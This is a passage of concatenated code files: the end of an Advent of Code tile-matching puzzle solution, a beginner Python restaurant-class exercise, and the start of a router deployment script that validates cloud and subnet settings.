"1110011000",
"1011010001",
],
"3767":[
"0100001000",
"0000000000",
"1100000000",
"0100000001",
"0000010100",
"0100000100",
"1000000101",
"1000001011",
"0000011101",
"0001011110",
],
"2957":[
"1101000011",
"1010000010",
"0100001000",
"1000010101",
"0000001000",
"1011001000",
"0000000001",
"0010110011",
"1110000000",
"0100010000",
],
"3911":[
"0010110110",
"1000100010",
"0101011111",
"1011100101",
"1001000100",
"1110010100",
"0001010000",
"1011000110",
"0000100000",
"1000101101",
],
"2683":[
"1011111010",
"1001001100",
"0000001111",
"1001100100",
"1011010001",
"1000000001",
"1110001001",
"1001000000",
"1011100001",
"0110101010",
],
"2267":[
"1010010100",
"0001010010",
"1001100100",
"1101000101",
"0010000001",
"1100001000",
"1000000000",
"1001100000",
"0001001000",
"1100111011",
],
"1709":[
"1001000100",
"0101100101",
"1000111001",
"1101101001",
"1101000000",
"1001001001",
"0011000100",
"1000011001",
"1000001111",
"1111111000",
],
"2347":[
"1101100001",
"1000000001",
"0000101000",
"0010110111",
"1100001101",
"0001010100",
"1001000000",
"0100000001",
"0000100000",
"0111011010",
],
"1051":[
"1110100011",
"1010000000",
"1000000011",
"0000000000",
"1110011100",
"0011100100",
"1001000100",
"0010000000",
"0000110010",
"0101011011",
],
"2903":[
"0001100000",
"1001010000",
"0001000000",
"1000100101",
"1001000000",
"1000100011",
"1100000000",
"1010000000",
"1000001100",
"0001111101",
],
"1619":[
"1001110101",
"1010000001",
"1000000011",
"0000001001",
"0110000001",
"1000001001",
"1011000101",
"1001100001",
"0100001010",
"0111101110",
],
"3203":[
"0001011010",
"1011100000",
"0100100101",
"1010011000",
"0000010101",
"0000000000",
"0110010001",
"0000011010",
"0000000001",
"0111110110",
],
"2269":[
"0110100010",
"1000011010",
"1011010110",
"1000001001",
"0000000000",
"1100000011",
"0000011010",
"1000000000",
"0000100000",
"0000011010",
],
"2027":[
"1001111111",
"1000110001",
"0001001011",
"1000100000",
"1000010000",
"1100010011",
"1000101001",
"1110011100",
"1010011111",
"1001001010",
],
"1973":[
"1101011001",
"0101010001",
"1000100001",
"1000000100",
"1000001100",
"0001000011",
"0100000100",
"1011000001",
"0000000011",
"0110100000",
],
"3559":[
"0111111011",
"0000000100",
"0011000011",
"1010101101",
"1001010101",
"0010101000",
"0101001001",
"1000101000",
"0101001001",
"1100001111",
],
"3319":[
"1000100000",
"0100110100",
"1101000001",
"0000000000",
"0011110000",
"0110010000",
"0001100000",
"1001000100",
"1110010000",
"1010011111",
],
"3631":[
"1100001001",
"0100111101",
"1101000101",
"1000010010",
"0000000000",
"0011000001",
"1001000101",
"0000000101",
"1011001010",
"0000011110",
],
"2377":[
"0000010001",
"1000010000",
"0010100000",
"0000010010",
"0000000011",
"1110000011",
"1000000000",
"0000100011",
"0000000001",
"0110101010",
],
"3331":[
"1001001010",
"1100000001",
"0000110000",
"0001110101",
"0111011010",
"1110000001",
"1010110000",
"1010001000",
"0001000001",
"0011111101",
],
"2473":[
"1011100001",
"1000101010",
"1000110001",
"0100100110",
"0000000010",
"0101010001",
"1010100101",
"0110000000",
"0100000001",
"1101001110",
],
"1039":[
"1100101101",
"1000000100",
"1110000101",
"0010010000",
"0110000000",
"1111011001",
"1100100100",
"0000010000",
"1100001010",
"1000001101",
],
"2111":[
"0100100010",
"1011010000",
"0111100101",
"1001010101",
"0010001000",
"0010101000",
"0000001010",
"1000001001",
"0011001001",
"1111000011",
],
"2039":[
"1011110111",
"0010101100",
"0010010000",
"1110000000",
"1010000001",
"0000000001",
"0100000001",
"1010001010",
"1111000001",
"1111110100",
],
"3391":[
"0111101010",
"1010001101",
"0101000001",
"0001100010",
"0100100100",
"0010011000",
"0000010100",
"1000010000",
"0100100100",
"1101100111",
],
"1913":[
"0101111111",
"1010010011",
"0110100000",
"1010000001",
"0000110000",
"1110010000",
"0000000011",
"1000001100",
"0100110001",
"1100001000",
],
"2693":[
"1001101001",
"0100001011",
"0100011001",
"0001100000",
"1110010011",
"1100100001",
"0001000001",
"1100000000",
"1111000110",
"1000101011",
],
"1033":[
"1111101000",
"1000000001",
"1010001010",
"0111000000",
"0011000010",
"1000111101",
"0000100101",
"0000011000",
"0000010011",
"1100110100",
],
"2273":[
"1011000011",
"0000000000",
"1001100010",
"1110000000",
"0010101011",
"1100000001",
"1100110010",
"0000000000",
"0000000001",
"0110011011",
],
"1049":[
"1110110000",
"1111000010",
"0001010000",
"0000110001",
"1000100001",
"1100011100",
"1100100000",
"1111000000",
"1100110001",
"0000011001",
],
"1787":[
"0101011011",
"1110100001",
"1000111010",
"0010000100",
"0000000001",
"0000101000",
"0110000010",
"0000011101",
"0111001000",
"0110111100",
],
"2689":[
"0000000111",
"0010010000",
"1000000101",
"1010110001",
"1010101000",
"0110000000",
"0010010100",
"0001100001",
"1000000101",
"0101111110",
],
"1933":[
"1111110100",
"0010100010",
"0001000101",
"1110100001",
"0010000010",
"1001111000",
"1100000000",
"0011100001",
"0000100000",
"1111101111",
],
"1823":[
"1110100101",
"0000000000",
"0101000100",
"0010011010",
"0100100110",
"1010100001",
"0100100001",
"0000000011",
"1110101000",
"1000000010",
],
"1439":[
"0100000101",
"0001010001",
"0001010000",
"0001100100",
"1000100100",
"0001010001",
"0100100001",
"1000111001",
"1001111100",
"1010100011",
],
"1657":[
"0111101101",
"1000010000",
"0100100000",
"0011001000",
"1100100001",
"0100000010",
"1011100010",
"0000000001",
"1011110000",
"1100001101",
],
"3517":[
"1101011010",
"1001000011",
"1100000011",
"1000100100",
"0110011000",
"0000000010",
"0010001101",
"1010010000",
"1100001101",
"1111001000",
],
"3943":[
"0101001101",
"1000000001",
"1001000000",
"1000000011",
"1100100000",
"1111000101",
"0111000010",
"1110000000",
"0110000000",
"0010001111",
],
"2801":[
"1101101110",
"1101110100",
"1101000000",
"0011100000",
"1101001000",
"1000000100",
"1011000001",
"1101010001",
"0000100001",
"0011110010",
],
"2411":[
"1010101000",
"0111101011",
"0000100101",
"0000000011",
"0000100100",
"1000110010",
"1010000001",
"1000001000",
"0100001001",
"0010000010",
],
"3907":[
"1000001001",
"0110010000",
"1100100000",
"0000010000",
"0100101110",
"1000000111",
"0000001000",
"1100000001",
"0000000011",
"1111011010",
],
"2819":[
"0010110101",
"0010010001",
"0001000101",
"0010001000",
"1000011010",
"1011010000",
"0000000001",
"1000100111",
"1110100000",
"0000001100",
],
"3307":[
"0101100110",
"1001000101",
"1010010000",
"1001000010",
"0000100010",
"1010010001",
"0001000001",
"0010001100",
"1010001001",
"1010000011",
],
"3313":[
"1011000110",
"0000000111",
"0000100100",
"1011101101",
"1110101001",
"0000110000",
"0000101101",
"1001011001",
"0010111010",
"1010101011",
],
"3037":[
"0111010000",
"1001001101",
"0001111000",
"1011001000",
"1000100100",
"0001000001",
"0000000010",
"1110110100",
"1011110010",
"1110010110",
],
"2053":[
"1111010000",
"1010011001",
"0100011101",
"1011110000",
"1000000000",
"1000001001",
"1010100000",
"0010100010",
"1001010001",
"0010010110",
],
"3769":[
"0000100110",
"1001000000",
"1000111001",
"1001100001",
"0100000001",
"1000000000",
"0100100110",
"1010100101",
"1010000000",
"1001100100",
],
"1759":[
"0001100001",
"0000000000",
"1110000001",
"1100000000",
"0000010000",
"1001100100",
"0000001010",
"1110011001",
"0100001001",
"0000001010",
],
"1229":[
"1011010100",
"1001000111",
"0001000001",
"0100001001",
"1011001101",
"1001000111",
"0000000000",
"0000011100",
"0010010011",
"1101000011",
],
"3821":[
"0110111101",
"0000001111",
"0000001010",
"1000010111",
"0101100101",
"0000000000",
"0001010001",
"0010001100",
"1101010011",
"1111000111",
],
"1319":[
"1011001011",
"0001001100",
"0010100000",
"0100100001",
"1001010100",
"1000001001",
"1010100000",
"0001110000",
"1101100010",
"0101101100",
],
"3167":[
"1010000011",
"0100011101",
"0100011010",
"1110010001",
"0000110011",
"0000010011",
"0010001011",
"0000000111",
"0000000001",
"1101010111",
],
"3407":[
"0001100101",
"0100011000",
"0000000001",
"1001001010",
"1010000101",
"0001010001",
"0101000000",
"0000100001",
"1001000010",
"0111100110",
],
"1231":[
"1000100111",
"1000000001",
"1100000001",
"1010010000",
"1010100000",
"0100100000",
"1000100000",
"1001000111",
"0010100001",
"1011011100",
],
"3623":[
"1101101100",
"1001000001",
"0000000010",
"1000000001",
"0000100000",
"0000000100",
"0000011001",
"1110001110",
"0011001001",
"0100111101",
],
"3541":[
"1000000010",
"1100000000",
"0111100010",
"0100100100",
"1000001001",
"0010001100",
"1001000110",
"1000011001",
"0000100010",
"0100111110",
],
"2939":[
"0010111001",
"0000001100",
"1000101000",
"1000000000",
"1000101000",
"1000010000",
"1100000100",
"0000000100",
"1110011111",
"0101110011",
],
"1847":[
"0111110110",
"0000101101",
"0001000000",
"0100100000",
"0000010101",
"1101100011",
"0000000101",
"0000000111",
"0000100100",
"0001011000",
],
"2887":[
"1111011010",
"1001100011",
"1001001000",
"1000000001",
"1101010001",
"1010011000",
"0001100010",
"1010010001",
"1010110000",
"1101101101",
],
"3697":[
"0110000011",
"1000000000",
"1110000000",
"0011010000",
"1100010100",
"1000100001",
"1000000001",
"0100000000",
"0101000000",
"1000100011",
],
"2081":[
"0111010010",
"0010100001",
"0000001011",
"1001010011",
"1000110000",
"1000010001",
"0111000000",
"0010010101",
"0010000111",
"1000100011",
],
"2383":[
"0000110110",
"0110000001",
"0100000001",
"1011010001",
"1001001001",
"1101000001",
"0010100100",
"1000010000",
"0101010100",
"1001010100",
],
"2557":[
"1100101110",
"0010000000",
"0100001100",
"0001010000",
"0001101000",
"1010100001",
"0000000011",
"1000001001",
"1100000100",
"0111001011",
],
"3637":[
"1001011101",
"0001001110",
"1000000010",
"0000000101",
"0001010000",
"0000000000",
"0000000001",
"0000000001",
"0111001110",
"1110101001",
],
"3989":[
"0001010101",
"0010011100",
"1000100111",
"1000011000",
"1000010101",
"0000000011",
"1011000011",
"1000001011",
"1011001001",
"0000001000",
],
"2221":[
"1000110111",
"0000010010",
"0100100001",
"0000010110",
"0010110001",
"0000000011",
"1000001111",
"0100000001",
"1011000100",
"1101111000",
],
"1523":[
"0010011110",
"0101000000",
"1000101101",
"1110010010",
"0000001100",
"0000000001",
"0001001100",
"1000010101",
"1000000100",
"0100010001",
],
"1583":[
"0111101011",
"1000101011",
"0000010000",
"0001000101",
"0111000001",
"0011010001",
"1011000000",
"1000011000",
"1001000001",
"0111100100",
],
"3919":[
"0010011000",
"0100010000",
"1011110100",
"0000000000",
"1001000000",
"1000000001",
"0001101001",
"0001000000",
"1001100001",
"0100001010",
],
"2381":[
"0000111111",
"0011001101",
"1000111100",
"0001000000",
"1110001011",
"1000100000",
"1011000011",
"0000100001",
"0000001010",
"0001101101",
],
"3923":[
"1111101010",
"0100000100",
"0000100000",
"1000100001",
"1100000000",
"0000001001",
"0000010001",
"1010001000",
"0111100001",
"1111000010",
],
"2953":[
"1010111001",
"0000101000",
"0101000011",
"1000110001",
"1000110010",
"1110000001",
"0101101000",
"0000000001",
"1101011010",
"0010001001",
],
"2441":[
"0000101010",
"1100101000",
"0000010101",
"1000010000",
"1001000111",
"1000010000",
"1000000111",
"0010010111",
"0100000001",
"0101011000",
],
"3023":[
"1010111110",
"0010000011",
"1001010001",
"0100001001",
"0010100011",
"1100000100",
"0100001011",
"1000000000",
"1111010000",
"1001101000",
],
"2659":[
"0001100100",
"1100011001",
"0100010011",
"1100001111",
"0000101111",
"1101000000",
"0010110001",
"0101001110",
"0000101101",
"0110011101",
],
"1069":[
"0110110011",
"1000000000",
"0100001000",
"1100000000",
"0010000001",
"0111000101",
"1100011001",
"1001010000",
"0010000010",
"0100111001",
],
"1181":[
"1101101100",
"1000001001",
"0010001001",
"0110100000",
"1000100001",
"1010000001",
"0001000101",
"1000011001",
"1001110100",
"0010010001",
],
"1663":[
"0000100100",
"0111011111",
"1001000101",
"0000000000",
"0000000001",
"0101100001",
"0110000000",
"0000000100",
"1100000011",
"0101100010",
],
"3779":[
"0110110101",
"1000100001",
"1001100001",
"0100010000",
"1100100010",
"0000000001",
"1000100011",
"1001000000",
"1110000010",
"0011001010",
],
"1013":[
"1011010101",
"0100100000",
"0101011000",
"1110000001",
"0101100101",
"0100100110",
"0000000000",
"0000100001",
"1000000101",
"1001110111",
],
"1747":[
"0101001110",
"0000000110",
"1001100100",
"0010101000",
"1100000011",
"1000000110",
"0000110011",
"0010100011",
"1000100100",
"1101110110",
],
"3931":[
"0011100100",
"1001000000",
"1100001000",
"0110001000",
"1000000001",
"0000101010",
"0111000001",
"0100100000",
"1101000000",
"1101111001",
],
"2593":[
"1011001001",
"0110000011",
"1011100011",
"1001000000",
"1100110001",
"1011000000",
"0010101001",
"0010000001",
"0001001000",
"0111101100",
],
"3677":[
"1010101011",
"0000100000",
"0100110000",
"0000011001",
"0010010100",
"0000000000",
"1110011000",
"1101111101",
"1000100000",
"1010011111",
],
"2633":[
"0100111101",
"0111000100",
"0000001001",
"0000111000",
"1001011000",
"0100110101",
"1100000101",
"1000000011",
"1000101001",
"1010010100",
],
"2129":[
"0011011100",
"1100100010",
"0010001000",
"1000001000",
"0000001001",
"0010110001",
"0000100111",
"1100001000",
"0000000000",
"0101011000",
],
"2029":[
"1101101110",
"1001000000",
"1100000010",
"0101110110",
"0001100011",
"1001000011",
"0001110101",
"0000100011",
"0010010000",
"0001000001",
],
"1873":[
"0100010001",
"1000110011",
"1101000001",
"1010010011",
"0000100000",
"0010011100",
"0000001001",
"0000000001",
"1000100010",
"1101100001",
],
"1567":[
"1100110010",
"0000110010",
"0010000010",
"0101000001",
"1010110001",
"0000110001",
"1000011001",
"0000101001",
"0100011001",
"1101001101",
],
"3571":[
"1111000010",
"0110111011",
"0000000001",
"0010000010",
"0000110100",
"0101000001",
"1000000000",
"1000010001",
"1000000001",
"1001011010",
],
"2671":[
"0001001100",
"0000000000",
"1001001100",
"1100001000",
"1000000011",
"1110100101",
"0011000011",
"1000100000",
"0100010001",
"0000001100",
],
"3229":[
"0001010010",
"1000000000",
"0001100000",
"0001000001",
"1011000000",
"0010101011",
"0001111000",
"0000011001",
"1000000000",
"0101110000",
],
"3083":[
"1100010101",
"1011100001",
"1001000101",
"0100010000",
"1000100001",
"1100010101",
"0010000001",
"1010000101",
"1001010100",
"0100100000",
],
"2239":[
"1111110101",
"1101101101",
"0000000110",
"1001000000",
"1100000111",
"0000000011",
"0010000100",
"1000111100",
"0000111100",
"0010111110",
],
"3581":[
"1110100111",
"1010100001",
"0001010011",
"1001000111",
"0101101000",
"1001001000",
"0001010101",
"1000100110",
"1100001100",
"1100011100",
],
"1061":[
"0000011100",
"1110001000",
"1010001110",
"0000000010",
"0100000101",
"1100011011",
"0000000001",
"1000011010",
"0100000100",
"0100010110",
],
"3967":[
"0011111111",
"1100000000",
"0110100010",
"0011011011",
"1010000101",
"0100000001",
"0000100000",
"1011000000",
"1100110100",
"0010001011",
],
"2749":[
"0111111101",
"1001001000",
"0001000000",
"0000100001",
"0000101110",
"0101010000",
"0100100000",
"0001000010",
"1011010010",
"1111101110",
],
"1811":[
"1010111010",
"1000000000",
"0000000001",
"0001000000",
"0000000011",
"0000000000",
"0111110001",
"1111010000",
"1000001000",
"1010101001",
],
"2477":[
"1111010011",
"0010110011",
"1000011000",
"1010001100",
"1111000011",
"1000000010",
"1111100001",
"0010000000",
"0000001000",
"0101101101",
],
"1949":[
"1011001111",
"1011001010",
"1110000000",
"1101000001",
"1001110011",
"1100000010",
"0000010011",
"1100011001",
"0100000000",
"1101101001",
],
"2099":[
"0011010011",
"0000101000",
"1000010101",
"0001001000",
"1100000110",
"1001110111",
"0100000101",
"0010000001",
"0000001000",
"0110010100",
],
"2767":[
"0101110100",
"0010101000",
"0001100000",
"0010000000",
"0000001001",
"0000000101",
"0000010000",
"1010110011",
"0010010000",
"1100010111",
],
"3251":[
"0011010000",
"0000000100",
"0000010101",
"0100110011",
"0101100001",
"1010000100",
"1100100001",
"0000000001",
"0010010011",
"0000111100",
],
"3833":[
"1001111011",
"0001000000",
"0100000101",
"1100110001",
"0000011001",
"1001010000",
"0001100011",
"0010110001",
"0000000011",
"1100001010",
],
"3089":[
"0010000000",
"0000010000",
"1111100010",
"1100100100",
"0101011011",
"0010110010",
"0000000100",
"1100100001",
"0001001000",
"0010111001",
],
"2861":[
"1000000100",
"0001000001",
"1000001001",
"1100000001",
"0100001001",
"1100101000",
"0000000010",
"1000000001",
"1011000111",
"1010111000",
],
"1489":[
"1101101011",
"0100000001",
"1001011001",
"1010000000",
"1010000100",
"1000001101",
"0110011110",
"0000010101",
"0000000111",
"1010100101",
],
"1801":[
"1000011111",
"1010000001",
"0000000001",
"1010000011",
"1000010001",
"0110001000",
"1101110101",
"0101001101",
"0010101001",
"1100111010",
],
"2677":[
"1010001011",
"0000000000",
"1000101101",
"1010000101",
"1000001001",
"0010010011",
"1011100101",
"1101000001",
"0000000011",
"1101111010",
],
"3797":[
"0011111010",
"1010010010",
"0010010110",
"0011010100",
"0110010000",
"0110110010",
"1000000111",
"0000000010",
"0101100010",
"0010011111",
]
}
from collections import defaultdict
tileborders = dict()
freq = defaultdict(int)
ownbyborder = defaultdict(list)
for k,v in m.items():
#clockwise
top = int(v[0],2)
right = int("".join([s[-1] for s in v]),2)
bottom = int(v[9][-1::-1],2)
left = int("".join([s[0] for s in v])[-1::-1],2)
#Counterclockwise
pot = int(v[0][-1::-1],2)
tfel = int("".join([s[0] for s in v]),2)
mottob = int(v[9],2)
thgir = int("".join([s[-1] for s in v])[-1::-1],2)
borders = [top, right, bottom, left, pot, tfel, mottob, thgir]
tileborders[k] = borders
for border in borders:
freq[border] += 1
ownbyborder[border].append(k)
coverfreq=defaultdict(int)
ret = 1
for k,v in m.items():
coveredborders = 0
for border in tileborders[k]:
if freq[border] > 1:
coveredborders += 1
coverfreq[coveredborders] += 1
if coveredborders == 4:
ret *= int(k)
onecorner = k
print("problem A", ret)
#make onecorner the top left one
borders = tileborders[onecorner]
connected = []
for i, border in enumerate(borders):
if freq[border] > 1:
connected.append((i, border)) #border pos, border value
assert len(connected) == 4
# Now I have the values of the two connected borders
# I'll use the first one to seed the first row
row=[(onecorner,connected[0], connected[1])]
sortedtiles = []
for i in range(12):
for _ in range(11):
bordertomatch = row[-1][1][1]
assert len(ownbyborder[bordertomatch]) == 2
for tile in ownbyborder[bordertomatch]:
if tile != row[-1][0]:
newtile = tile
matchingpos = tileborders[newtile].index(bordertomatch)
nextmatchingpos = [6,5,4,7,2,1,0,3][matchingpos]
bottommatchingpos = [7,6,5,4,3,2,1,0][matchingpos]
row.append((newtile, (nextmatchingpos, tileborders[newtile][nextmatchingpos]), (bottommatchingpos, tileborders[newtile][bottommatchingpos])))
sortedtiles.append(row)
if i < 11: #prepare next row, we have to match the bottom of the first
bordertomatch = row[0][2][1]
assert len(ownbyborder[bordertomatch]) == 2
for tile in ownbyborder[bordertomatch]:
if tile != row[0][0]:
newtile = tile
matchingpos = tileborders[newtile].index(bordertomatch)
nextmatchingpos = [5, 4, 7, 6, 1, 0, 3, 2][matchingpos]
bottommatchingpos = [6, 5, 4, 7, 2, 1, 0, 3][matchingpos]
row = [(newtile, (nextmatchingpos, tileborders[newtile][nextmatchingpos]), (bottommatchingpos, tileborders[newtile][bottommatchingpos]))]
def convert(tile, right):
#borders off
t = [s[1:-1] for s in m[tile][1:-1]]
if right == 0:
return([[s[i] for s in reversed(t)] for i in range(8)])
if right == 1:
return(t)
if right == 2:
return([[s[i] for s in t] for i in range(7, -1, -1)])
if right == 3:
return([list(reversed(s)) for s in reversed(t)])
if right == 4:
return([[s[i] for s in reversed(t)] for i in range(7,-1,-1)])
if right == 5:
return([list(reversed(s)) for s in t])
if right == 6:
return([[s[i] for s in t] for i in range(8)])
if right == 7:
return([s for s in reversed(t)])
    assert False
#first we will do a 1/0 bidimensional array for the map
map = [ [0] * 12 * 8 for _ in range(12 * 8)]
for row in range(len(sortedtiles)):
for col in range(len(sortedtiles[0])):
tilecell = sortedtiles[row][col]
t = convert(tilecell[0], tilecell[1][0])
for subrow in range(len(t)):
for subcol in range(len(t[0])):
map[8*row+subrow][8*col+subcol]=t[subrow][subcol]
from pprint import pprint
#pprint(map)
for r in map:
print("".join(r))
# Now make it a list of 12*8 INTs
nbitmap = [int("".join(row),2) for row in map]
# And a rotated version of the map
rmap = [[r[i] for r in map] for i in range(12*8)]
rbitmap = [int("".join(row),2) for row in rmap]
# FINALLY, try to find dragons
dragon=[
0b00000000000000000010,
0b10000110000110000111,
0b01001001001001001000
]
##12345678901234567890
nogard=[
0b01000000000000000000,
0b11100001100001100001,
0b00010010010010010010
]
seacreatures = 0
for j, bitmap in enumerate([nbitmap, rbitmap]):
dragons = 0
nogards = 0
inversedragons = 0
inversenogards = 0
for row in range(12*8-3):
for column in range(12*8-20):
dragonfound = True
nogardfound = True
inversedragonfound = True
inversenogardfound = True
for i in [0,1,2]:
dragonfound = dragonfound and (((dragon[i]<<column) & (bitmap[row+i]))==(dragon[i]<<column))
nogardfound = nogardfound and (((nogard[i]<<column) & (bitmap[row+i]))==(nogard[i]<<column))
inversedragonfound = inversedragonfound and (((dragon[i]<<column) & (bitmap[row+2-i]))==(dragon[i]<<column))
inversenogardfound = inversenogardfound and (((nogard[i]<<column) & (bitmap[row+2-i]))==(nogard[i]<<column))
if dragonfound: dragons +=1
if nogardfound: nogards +=1
if inversedragonfound: inversedragons +=1
if inversenogardfound: inversenogards +=1
print(j, dragons, nogards, inversedragons, inversenogards)
seacreatures = max(seacreatures, dragons, nogards, inversedragons, inversenogards)
def countbits(arr):
ret = 0
for row in arr:
ret += bin(row).count("1")
return(ret)
print("Problem B", countbits(nbitmap) - seacreatures * countbits(dragon))
#pprint(bitmap) | StarcoderdataPython |
1653463 | <gh_stars>0
#Done by <NAME> in 04/07/2020
"""
Start with your program from Exercise 9-1 (page 162).
Add an attribute called number_served with a default value of 0. Create an
instance called restaurant from this class. Print the number of customers the
restaurant has served, and then change this value and print it again.
Add a method called set_number_served() that lets you set the number
of customers that have been served. Call this method with a new number and
print the value again.
"""
#Number served
class Restaurant:
"""An attempt to model a restaurant."""
def __init__(self, restaurante_name, cuisine_type):
self.restaurante_name = restaurante_name
self.cuisine_type = cuisine_type
self.number_served = 0
def describe_restaurant(self):
"""Prints information about the restaurant."""
msg = f"{self.restaurante_name} is a {self.cuisine_type} restaurant."
print(msg)
def open_restaurant(self):
"""Prints a message indicating the restaurant is open."""
msg = f"{self.restaurante_name} is now open!!"
print(msg)
def set_number_served(self, number_served):
"""Ability to set the number the costumers that've been served."""
self.number_served = number_served
def increment_number_served(self, increment):
"""Ability to increment the no. of costumers that've been served."""
self.number_served += increment
restaurant = Restaurant('Mercantel', 'cozinha')
restaurant.describe_restaurant()
restaurant.open_restaurant()
print(f"\nRestaurant has served: {restaurant.number_served} costumers.")
restaurant.number_served = 34
print(f"Restaurant has served: {restaurant.number_served} costumers.")
restaurant.set_number_served(100)
print(f"Restaurant has served: {restaurant.number_served} costumers.")
restaurant.increment_number_served(222)
print(f"Restaurant has served: {restaurant.number_served} costumers.")
| StarcoderdataPython |
3299155 | # stdlib
import json
import re
import traceback
from typing import Any, Dict, Optional
# libs
import netaddr
# local
from bin import RouterMixin, utils
import settings
ADDRESS_NAME_SUB_PATTERN = re.compile(r'[\.\/:]')
class RouterScrub(RouterMixin):
def run(self):
self.run_router()
def prompt(self):
print()
utils.colour_print('(colour_cmd)\u250D' + ('\u2501' * 30) + '\u2511')
utils.colour_print('\u2502' + (' ' * 30) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 12) + '(colour_warning)WARNING(colour_cmd)' + (' ' * 11) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 30) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 2) + '(colour_clear)Deploying a router deletes'
'(colour_cmd)' + (' ' * 2) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 3) + '(colour_clear)all of the configuration'
'(colour_cmd)' + (' ' * 3) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 8) + '(colour_clear)on that device'
'(colour_cmd)' + (' ' * 8) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 30) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 6) + '(colour_clear)Deploying a router'
'(colour_cmd)' + (' ' * 6) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 5) + '(colour_clear)ALREADY in production'
'(colour_cmd)' + (' ' * 4) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 2) + '(colour_clear)will cause service outages.'
'(colour_cmd)' + ' ' + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 3) + '(colour_clear)Make sure you have read'
'(colour_cmd)' + (' ' * 4) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 4) + '(colour_clear)the "help" and updated'
'(colour_cmd)' + (' ' * 4) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 3) + '(colour_clear)settings file correctly.'
'(colour_cmd)' + (' ' * 3) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 5) + '(colour_clear)Press (colour_cmd)Y or y '
'(colour_clear)to continue.(colour_cmd)' + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 5) + '(colour_clear)Press (colour_cmd)Any key '
'(colour_clear)to exit.(colour_cmd)' + (' ' * 3) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 30) + '\u2502')
utils.colour_print(
'\u2515' + ('\u2501' * 30) + '\u2519(colour_clear)')
print()
def run_router(self):
try:
self.prompt()
if input() not in ['Y', 'y']:
return
utils.line_break()
print()
# loading settings data
utils.colour_print('Reading the settings file...')
# validating map_access_list
utils.colour_print('Validating MAP_ACCESS_LIST ...')
map_access_list = settings.MAP_ACCESS_LIST
for firewall in map_access_list:
self.validate_firewall(firewall)
clouds = settings.clouds
if clouds[0]['name'] in ['', None]:
utils.error(f'Invalid cloud name, Please edit the settings file correctly')
return
label = f'All available clouds in the settings file are:'
utils.colour_print(
'┌─────────────────────────────────────────────────┐',
)
utils.colour_print(f'│{label:^49}│')
utils.colour_print(
'├───────────┬─────────────────────────────────────┤',
)
utils.colour_print(
'│ id │ Name │',
)
utils.colour_print(
'├───────────┼─────────────────────────────────────┤',
)
cloud_ids = []
for cloud in clouds:
cloud_ids.append(cloud['id'])
utils.colour_print(f'│{cloud["id"]:^11}│{cloud["name"]:^37}│')
utils.colour_print(
'└───────────┴─────────────────────────────────────┘',
)
cloud_id = input(
utils.colour('(colour_warning)Select the cloud by entering "id" of the cloud.(colour_clear): '),
)
if cloud_id not in cloud_ids:
utils.error('Invalid cloud id, exiting. Please try again with correct cloud id.')
return
the_cloud = None
for cloud in clouds:
if cloud['id'] == cloud_id:
the_cloud = cloud
# validating the cloud settings
utils.colour_print('Validating COP_ACCESS_LIST ...')
cop_access_list = the_cloud['COP_ACCESS_LIST']
for firewall in cop_access_list:
self.validate_firewall(firewall)
pods = the_cloud['pods']
label = f'All available pods from the cloud #{the_cloud["name"]} are:'
utils.colour_print(
'┌───────────────────────────────────────────────────────────┐',
)
utils.colour_print(f'│{label:^59}│')
utils.colour_print(
'├───────────┬────────────────────────────────────┬──────────┤',
)
utils.colour_print(
'│ id │ Name │ Type │',
)
utils.colour_print(
'├───────────┼────────────────────────────────────┼──────────┤',
)
pod_ids = []
for pod in pods:
pod_ids.append(pod['id'])
utils.colour_print(f'│{pod["id"]:^11}│{pod["name"]:^36}│{pod["type"]:^10}│')
utils.colour_print(
'└───────────┴────────────────────────────────────┴──────────┘',
)
pod_id = input(
utils.colour('(colour_warning)Select the pod by entering "id" of the pod.(colour_clear): '),
)
if pod_id not in pod_ids:
utils.error('Invalid pod id, exiting. Please try again with correct pod id.')
return
the_pod = None
for pod in pods:
if pod['id'] == pod_id:
the_pod = pod
public_port_config = []
# validating the pod settings
utils.colour_print('validating IPv4_link_subnet...')
for subnet in the_pod['IPv4_link_subnet']:
if subnet['address_range'] != '':
if not self.validate_address(subnet['address_range']):
utils.error(f'Invalid address_range in IPv4_link_subnet #{subnet}')
exit()
if not self.validate_address(subnet['gateway']):
utils.error(f'Invalid gateway in IPv4_link_subnet #{subnet}')
exit()
public_port_config.append(subnet)
utils.colour_print('validating IPv4_pod_subnets...')
for subnet in the_pod['IPv4_pod_subnets']:
if not self.validate_address(subnet['address_range']):
utils.error(f'Invalid address_range in IPv4_pod_subnets #{subnet}')
exit()
if not self.validate_address(subnet['gateway']):
utils.error(f'Invalid gateway in IPv4_link_subnet #{subnet}')
exit()
public_port_config.append(subnet)
utils.colour_print('validating IPv6_link_subnet...')
for subnet in the_pod['IPv6_link_subnet']:
if not self.validate_address(subnet['address_range']):
utils.error(f'Invalid address_range in IPv6_link_subnet #{subnet}')
exit()
if not self.validate_address(subnet['gateway']):
utils.error(f'Invalid gateway in IPv6_link_subnet #{subnet}')
exit()
public_port_config.append(subnet)
mgmt_port_config = []
utils.colour_print('validating IPv6_pod_subnets...')
for subnet in the_pod['IPv6_pod_subnets']:
if not self.validate_address(subnet['address_range']):
utils.error(f'Invalid address_range in IPv6_pod_subnets #{subnet}')
exit()
address = subnet['address_range'].split('/')
subnet['address_range'] = f'{address[0]}10:0:1/64'
subnet['gateway'] = f'{address[0]}10:0:1'
mgmt_port_config.append(subnet)
utils.colour_print('validating IPv4_RFC1918_subnets...')
for subnet in the_pod['IPv4_RFC1918_subnets']:
if not self.validate_address(subnet['address_range']):
utils.error(f'Invalid address_range in IPv4_RFC1918_subnets #{subnet}')
exit()
if not self.validate_address(subnet['gateway']):
utils.error(f'Invalid gateway in IPv4_RFC1918_subnets #{subnet}')
exit()
mgmt_port_config.append(subnet)
access_addrs = map_access_list + cop_access_list
mgmt_access_addresses = []
for item in access_addrs:
